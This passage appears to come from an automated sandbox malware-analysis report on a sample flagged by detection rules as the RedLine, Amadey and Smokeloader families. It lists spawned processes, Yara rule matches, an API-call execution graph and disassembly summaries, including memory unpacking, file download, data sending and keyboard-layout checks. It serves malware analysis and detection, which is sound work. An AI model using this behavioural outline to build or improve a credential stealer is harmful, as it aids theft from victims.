                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000017.00000003.2238394423.0000000004530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:25
                  Start time:11:35:08
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1212
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:27
                  Start time:11:35:10
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 476
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:33
                  Start time:11:36:00
                  Start date:10/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Imagebase:0x400000
                  File size:439'808 bytes
                  MD5 hash:233EA23B1C1587F1CF895F08BA6DA10B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000003.2753930004.0000000004580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000002.2878258243.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:35
                  Start time:11:36:01
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 536
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:37
                  Start time:11:36:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 556
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:39
                  Start time:11:36:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 532
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                    Execution Graph

                    Execution Coverage:1.5%
                    Dynamic/Decrypted Code Coverage:4.3%
                    Signature Coverage:26.6%
                    Total number of Nodes:647
                    Total number of Limit Nodes:19
404bc4 58723->58724 58725 404bee 58723->58725 58726 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58724->58726 58750 417fd0 26 API calls 4 library calls 58725->58750 58727 404bdb 58726->58727 58728 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58727->58728 58730 404bea 58728->58730 58730->58664 58731 404c4b 58732 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58731->58732 58733 404d86 58732->58733 58733->58664 58737 41812e CatchIt 58734->58737 58739 418154 58734->58739 58735 41823e 58753 419380 26 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 58735->58753 58737->58676 58738 418243 58754 402440 26 API calls 3 library calls 58738->58754 58739->58735 58740 4181a8 58739->58740 58741 4181cd 58739->58741 58740->58738 58751 402440 26 API calls 3 library calls 58740->58751 58747 4181b9 std::_Rethrow_future_exception 58741->58747 58752 402440 26 API calls 3 library calls 58741->58752 58743 418248 58746 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58746->58735 58747->58746 58748 418220 ISource 58747->58748 58748->58676 58749->58722 58750->58731 58751->58747 58752->58747 58754->58743 58755 44c003c 58756 44c0049 58755->58756 58770 44c0e0f SetErrorMode SetErrorMode 58756->58770 58761 44c0265 58762 44c02ce VirtualProtect 58761->58762 58764 44c030b 58762->58764 58763 44c0439 VirtualFree 58768 44c04be 58763->58768 58769 44c05f4 LoadLibraryA 58763->58769 58764->58763 58765 44c04e3 LoadLibraryA 58765->58768 58767 44c08c7 58768->58765 58768->58769 58769->58767 58771 44c0223 58770->58771 58772 44c0d90 58771->58772 58773 44c0dad 58772->58773 58774 44c0dbb GetPEB 58773->58774 58775 44c0238 VirtualAlloc 58773->58775 58774->58775 58775->58761 58776 408782 58777 408786 58776->58777 58778 408788 GetFileAttributesA 58776->58778 58777->58778 58779 408794 58778->58779 58780 41d872 58781 41d87e 
__FrameHandler3::FrameUnwindToState 58780->58781 58806 41d598 58781->58806 58783 41d885 58784 41d9de 58783->58784 58794 41d8af ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 58783->58794 58829 41dcb5 4 API calls 2 library calls 58784->58829 58786 41d9e5 58830 436739 58786->58830 58790 41d9f3 58791 41d8ce 58792 41d94f 58814 43965d 58792->58814 58794->58791 58794->58792 58828 436713 59 API calls 4 library calls 58794->58828 58796 41d955 58818 416d80 58796->58818 58807 41d5a1 58806->58807 58834 41dea1 IsProcessorFeaturePresent 58807->58834 58809 41d5ad 58835 4348d4 10 API calls 2 library calls 58809->58835 58811 41d5b2 58813 41d5b6 58811->58813 58836 4348f3 7 API calls 2 library calls 58811->58836 58813->58783 58815 43966b 58814->58815 58816 439666 58814->58816 58815->58796 58837 4393c1 49 API calls 58816->58837 58819 416d8b 58818->58819 58838 40cdf0 58819->58838 58821 416d95 58822 40d680 37 API calls 58821->58822 58823 416d9a 58822->58823 58824 414f70 77 API calls 58823->58824 58825 416d9f 58824->58825 58826 416d30 CreateThread CreateThread CreateThread 58825->58826 58827 416d70 Sleep 58826->58827 58827->58827 58828->58792 58829->58786 58843 4365d7 58830->58843 58833 4366fd 23 API calls __FrameHandler3::FrameUnwindToState 58833->58790 58834->58809 58835->58811 58836->58813 58837->58815 58839 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58838->58839 58840 40ce42 58839->58840 58841 405bc0 36 API calls 58840->58841 58842 40ce4d 58841->58842 58844 4365f7 58843->58844 58845 4365e5 58843->58845 58855 43647e 58844->58855 58871 41ddd7 GetModuleHandleW 58845->58871 58849 4365ea 58849->58844 58872 43667d GetModuleHandleExW 58849->58872 58850 41d9eb 58850->58833 58853 43663a 58856 43648a __FrameHandler3::FrameUnwindToState 58855->58856 58878 438e6b EnterCriticalSection 58856->58878 58858 436494 58879 4364ea 58858->58879 58860 4364a1 58883 4364bf 58860->58883 58863 43663b 58888 
43a3a2 GetPEB 58863->58888 58866 43666a 58869 43667d __FrameHandler3::FrameUnwindToState 3 API calls 58866->58869 58867 43664a GetPEB 58867->58866 58868 43665a GetCurrentProcess TerminateProcess 58867->58868 58868->58866 58870 436672 ExitProcess 58869->58870 58871->58849 58873 4366bf 58872->58873 58874 43669c GetProcAddress 58872->58874 58875 4366c5 FreeLibrary 58873->58875 58876 4365f6 58873->58876 58877 4366b1 58874->58877 58875->58876 58876->58844 58877->58873 58878->58858 58880 4364f6 __FrameHandler3::FrameUnwindToState 58879->58880 58882 436557 __FrameHandler3::FrameUnwindToState 58880->58882 58886 439945 14 API calls __FrameHandler3::FrameUnwindToState 58880->58886 58882->58860 58887 438eb3 LeaveCriticalSection 58883->58887 58885 4364ad 58885->58850 58885->58863 58886->58882 58887->58885 58889 43a3bc 58888->58889 58891 436645 58888->58891 58892 43b367 5 API calls __dosmaperr 58889->58892 58891->58866 58891->58867 58892->58891 58893 40d109 GetModuleFileNameA 58894 40d141 58893->58894 58894->58894 58895 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58894->58895 58896 40d15d 58895->58896 58897 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58896->58897 58898 40d170 58897->58898 58899 405bc0 36 API calls 58898->58899 58900 40d17b 58899->58900 58902 40d1a4 58900->58902 59022 419050 26 API calls 4 library calls 58900->59022 58941 418270 58902->58941 58904 40d52c 58905 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58904->58905 58907 40d531 58905->58907 58906 40d22a ISource 58906->58904 58908 40d3f1 ISource 58906->58908 58909 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58907->58909 58910 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58908->58910 58913 40d495 ISource 58908->58913 58917 40d536 58909->58917 58912 40d430 58910->58912 58911 40d4fa ISource 58914 41d101 
Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58911->58914 58915 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58912->58915 58913->58907 58913->58911 58918 40d51b 58914->58918 58916 40d45c 58915->58916 58919 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58916->58919 58920 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58917->58920 58921 40d477 58919->58921 58922 40d58d 58920->58922 58923 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58921->58923 58924 405bc0 36 API calls 58922->58924 58925 40d48c 58923->58925 58926 40d595 58924->58926 58949 40b170 GetUserNameA 58925->58949 58928 418270 26 API calls 58926->58928 58929 40d5a5 58928->58929 58930 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58929->58930 58931 40d5c0 58930->58931 58932 405bc0 36 API calls 58931->58932 58933 40d5c7 58932->58933 58934 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58933->58934 58935 40d5dc 58934->58935 58936 405bc0 36 API calls 58935->58936 58937 40d5e3 ISource 58936->58937 58938 40d65a ISource 58937->58938 58939 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58937->58939 58940 40d679 58939->58940 58942 4182e2 58941->58942 58943 418298 58941->58943 58946 4182f1 CatchIt 58942->58946 59024 419050 26 API calls 4 library calls 58942->59024 58943->58942 58944 4182a1 58943->58944 59023 419390 26 API calls 2 library calls 58944->59023 58946->58906 58948 4182aa 58948->58906 58950 40b1e7 58949->58950 58950->58950 58951 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58950->58951 58952 40b203 58951->58952 58953 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58952->58953 58954 40b2ad 58953->58954 58955 40b37d CoInitialize 
58954->58955 58956 40b3a1 CoCreateInstance 58955->58956 58971 40b3ca ISource 58955->58971 58957 40b750 58956->58957 58958 40b3c4 CoUninitialize 58956->58958 58959 40b776 58957->58959 58969 40b81b StructuredWorkStealingQueue 58957->58969 58958->58971 58963 40b792 CoUninitialize 58959->58963 58964 40b7a9 CoUninitialize 58959->58964 58959->58971 58960 40b9b2 58961 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58960->58961 58962 40b9b7 58961->58962 58965 40ba16 CoInitialize 58962->58965 58963->58971 58966 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58964->58966 58967 40ba31 CoCreateInstance 58965->58967 58968 40ba57 ISource 58965->58968 58970 40b7c3 58966->58970 58972 40ba51 CoUninitialize 58967->58972 58983 40bad7 58967->58983 58978 40bb5a 58968->58978 58981 40bad5 ISource 58968->58981 58992 40b89c GetLocalTime 58969->58992 58973 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58970->58973 58971->58960 58977 40b74b ISource 58971->58977 58972->58968 58974 40b7db 58973->58974 58975 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58974->58975 58979 40b7f3 58975->58979 58976 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58980 40b9ae 58976->58980 58977->58976 58986 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58978->58986 58984 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58979->58984 58980->58913 58982 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58981->58982 58985 40bb56 58982->58985 58983->58968 58990 40bb10 CoUninitialize 58983->58990 58991 40bb24 CoUninitialize 58983->58991 58987 40b805 58984->58987 58985->58913 58988 40bb5f 58986->58988 58989 40b170 45 API calls 58987->58989 58995 40bba6 StructuredWorkStealingQueue 58988->58995 58997 40bd50 ISource 
58988->58997 58989->58971 58993 40bb1f 58990->58993 58991->58968 59007 40b93b CoUninitialize 58992->59007 58993->58968 58994 40bdba ISource 58998 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58994->58998 58999 40bbc6 CreateFileA InternetOpenA InternetOpenUrlA InternetReadFile 58995->58999 58996 40bdec 59000 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58996->59000 58997->58994 58997->58996 59001 40bdde 58998->59001 59002 40bc67 CloseHandle InternetCloseHandle InternetCloseHandle 58999->59002 59003 40bc38 58999->59003 59004 40bdf1 59000->59004 59001->58913 59005 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59002->59005 59003->59002 59006 40bc47 WriteFile InternetReadFile 59003->59006 59009 40bc8a 59005->59009 59006->59002 59006->59003 59007->58971 59010 40bcd5 ISource 59009->59010 59013 40bde2 59009->59013 59011 40bd3b ISource 59010->59011 59025 436b54 42 API calls 2 library calls 59010->59025 59011->58997 59014 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59013->59014 59016 40bde7 59014->59016 59015 40bcf4 59026 406de0 26 API calls 2 library calls 59015->59026 59018 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59016->59018 59018->58996 59019 40bd02 RemoveDirectoryA 59019->59011 59021 40bd19 59019->59021 59021->59011 59021->59016 59022->58902 59023->58948 59024->58946 59025->59015 59026->59019 59027 295fbce 59028 295fbdd 59027->59028 59031 296036e 59028->59031 59037 2960389 59031->59037 59032 2960392 CreateToolhelp32Snapshot 59033 29603ae Module32First 59032->59033 59032->59037 59034 295fbe6 59033->59034 59035 29603bd 59033->59035 59038 296002d 59035->59038 59037->59032 59037->59033 59039 2960058 59038->59039 59040 29600a1 59039->59040 59041 2960069 VirtualAlloc 59039->59041 59040->59040 59041->59040 59042 40d74c 59043 40d757 59042->59043 59044 40d77c ISource 
59042->59044 59043->59044 59045 40db1a 59043->59045 59047 40d8b5 GetModuleFileNameA 59044->59047 59046 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59045->59046 59048 40db1f 59046->59048 59049 40d8f0 59047->59049 59050 4368c7 67 API calls 59048->59050 59049->59049 59052 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59049->59052 59051 40db25 59050->59051 59067 417a10 59051->59067 59060 40d90c 59052->59060 59055 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59056 40db55 59055->59056 59057 417a10 26 API calls 59056->59057 59062 40db68 59057->59062 59058 40daf2 ISource 59059 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 59058->59059 59061 40db13 59059->59061 59060->59058 59063 40db7b 59060->59063 59062->59063 59064 436739 23 API calls 59062->59064 59065 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59063->59065 59064->59063 59066 40db80 59065->59066 59068 417a30 59067->59068 59068->59068 59069 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59068->59069 59070 40db3a 59069->59070 59070->59055
                    APIs
                    • SetCurrentDirectoryA.KERNEL32(00000000,1F0F83C3,00000000), ref: 0040A9DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID: @3P$VUUU$hT2F$ht3F
                    • API String ID: 1611563598-2132849557
                    • Opcode ID: 5123107eb2995f2fe36b83faf7bb0f6a7537e4b13b0722997637141e4264aec4
                    • Instruction ID: 7686e5737b89a74435b9d98a5fabf4de63ad4f7b50ea679e9c4903c729b64dbd
                    • Opcode Fuzzy Hash: 5123107eb2995f2fe36b83faf7bb0f6a7537e4b13b0722997637141e4264aec4
                    • Instruction Fuzzy Hash: 59C2E4B1A002089FDB18DF28CD89BDDB775EF45304F1085AEE419A72D1DB399A84CF99
                    APIs
                      • Part of subcall function 00408B00: GetTempPathA.KERNEL32(00000104,?,1F0F83C3,?,00000000), ref: 00408B47
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00409A43
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilePathTemp
                    • String ID:
                    • API String ID: 3199926297-0
                    • Opcode ID: 720b2ab1bd4a9574574f78251e76698971cee21b1115bf75c549fe42240a8655
                    • Instruction ID: 300cc23dac7bbdec6802486b90ae88e6198841c70d610ab3b66933c1455241e6
                    • Opcode Fuzzy Hash: 720b2ab1bd4a9574574f78251e76698971cee21b1115bf75c549fe42240a8655
                    • Instruction Fuzzy Hash: E342E370D00248DBEF14EBB8C6497DE7BB1AF06314F24426AD411773C2D7BD5A848BAA

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,1F0F83C3), ref: 00407E1A
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E7B
                    • GetProcAddress.KERNEL32(00000000), ref: 00407E82
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F43
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F47
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                    • String ID:
                    • API String ID: 374719553-0
                    • Opcode ID: bf645a1796ace3e4da1679d878ac74b2a2a97ee8d9703dd8f91cffd96e297072
                    • Instruction ID: 784d6eb4ad79aa1e17a967bc2ef708f0396776d1d42dc3bf5217fbcf21c48606
                    • Opcode Fuzzy Hash: bf645a1796ace3e4da1679d878ac74b2a2a97ee8d9703dd8f91cffd96e297072
                    • Instruction Fuzzy Hash: 52D10870E00604EBDB14BB28CD4A39E7A71AB81714F5442AEE815773C2DB7D5E848BCB

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1316 43663b-436648 call 43a3a2 1319 43666a-436676 call 43667d ExitProcess 1316->1319 1320 43664a-436658 GetPEB 1316->1320 1320->1319 1321 43665a-436664 GetCurrentProcess TerminateProcess 1320->1321 1321->1319
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0043663A,?,?,?,?,?,0043768E), ref: 0043665D
                    • TerminateProcess.KERNEL32(00000000,?,0043663A,?,?,?,?,?,0043768E), ref: 00436664
                    • ExitProcess.KERNEL32 ref: 00436676
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction ID: f65fa2cbf11c9341c6ec27041228dabd0dafc272b041e2f68e728e25dfebead6
                    • Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction Fuzzy Hash: 54E08C31000608BFCF112F55DD0EE493B28FF08786F058425F80586232CB3ADC92CB89

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1491 296036e-2960387 1492 2960389-296038b 1491->1492 1493 2960392-296039e CreateToolhelp32Snapshot 1492->1493 1494 296038d 1492->1494 1495 29603a0-29603a6 1493->1495 1496 29603ae-29603bb Module32First 1493->1496 1494->1493 1495->1496 1503 29603a8-29603ac 1495->1503 1497 29603c4-29603cc 1496->1497 1498 29603bd-29603be call 296002d 1496->1498 1501 29603c3 1498->1501 1501->1497 1503->1492 1503->1496
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02960396
                    • Module32First.KERNEL32(00000000,00000224), ref: 029603B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0295F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_295f000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 728bf349075a5d65f064848aa27be32723c54e47c928abf0ee8f0e9efc0335e2
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 1EF062311007116BD7202AB598CDF7E76ECBF49625F141529E646D10C0DB70E8458A61
                    APIs
                    • GetUserNameA.ADVAPI32(?,?), ref: 0040B1BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a21137b5b85cae10e728cd7cf4b3e35a25e211850e38fb81cb08e2b5d5c66efc
                    • Instruction ID: a1e19f45e05bfbfc76289ed511d5f33cdcaaee103fe52927b7173f82fbb20f69
                    • Opcode Fuzzy Hash: a21137b5b85cae10e728cd7cf4b3e35a25e211850e38fb81cb08e2b5d5c66efc
                    • Instruction Fuzzy Hash: 68212CB191015CABDB29DF14CD65BEAB7B8FB09704F0042DDE50663181DB745B88CFA1

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: 34ebc3dd9a0bc791d95d53018ad29f9cf2716dfc3ee6d589c574769b2dcfbc3f
                    • Instruction ID: 76edcd2264c5843344100667b3f81de8b4abb57d1d227a43f18c015c8770d745
                    • Opcode Fuzzy Hash: 34ebc3dd9a0bc791d95d53018ad29f9cf2716dfc3ee6d589c574769b2dcfbc3f
                    • Instruction Fuzzy Hash: 6AF1E37090021CABEB24DF54CD49BDEBBB9EB44304F5041AEE409A72C1DB789AC4CF99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                      • Part of subcall function 00441815: CreateFileW.KERNELBASE(00000000,00000000,?,00441C05,?,?,00000000,?,00441C05,00000000,0000000C), ref: 00441832
                    • GetLastError.KERNEL32 ref: 00441C70
                    • __dosmaperr.LIBCMT ref: 00441C77
                    • GetFileType.KERNELBASE(00000000), ref: 00441C83
                    • GetLastError.KERNEL32 ref: 00441C8D
                    • __dosmaperr.LIBCMT ref: 00441C96
                    • CloseHandle.KERNEL32(00000000), ref: 00441CB6
                    • CloseHandle.KERNEL32(0043AD32), ref: 00441E03
                    • GetLastError.KERNEL32 ref: 00441E35
                    • __dosmaperr.LIBCMT ref: 00441E3C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction ID: 112139b02b37b4a3a6abafbf4eec10d106d9ccfade03311548451970410361b9
                    • Opcode Fuzzy Hash: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction Fuzzy Hash: E2A14A32A142458FEF19DF68DC91BAE3BA1EB0A324F14015EF811AB3A1D7399C42C759

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D8C3
                    • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0040D9DF
                    • send.WS2_32(?,?,00000004,00000000), ref: 0040DBDE
                    • send.WS2_32(?,?,00000008,00000000), ref: 0040DC1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: send$CreateDirectoryFileModuleName
                    • String ID:
                    • API String ID: 2319890793-0
                    • Opcode ID: 626752a985912e68c41229b7841de364dc2e633fe692349d9defd2931ffdd168
                    • Instruction ID: db6d04ff986ec1ab9d9087d995072b3e4fab4856c6fac32bb73d1e3453718b91
                    • Opcode Fuzzy Hash: 626752a985912e68c41229b7841de364dc2e633fe692349d9defd2931ffdd168
                    • Instruction Fuzzy Hash: 96F11671E00218ABDB24DB68CC497DDB774AF45314F1042AEE419B72C2DB78AAC4CB99

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 044C024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
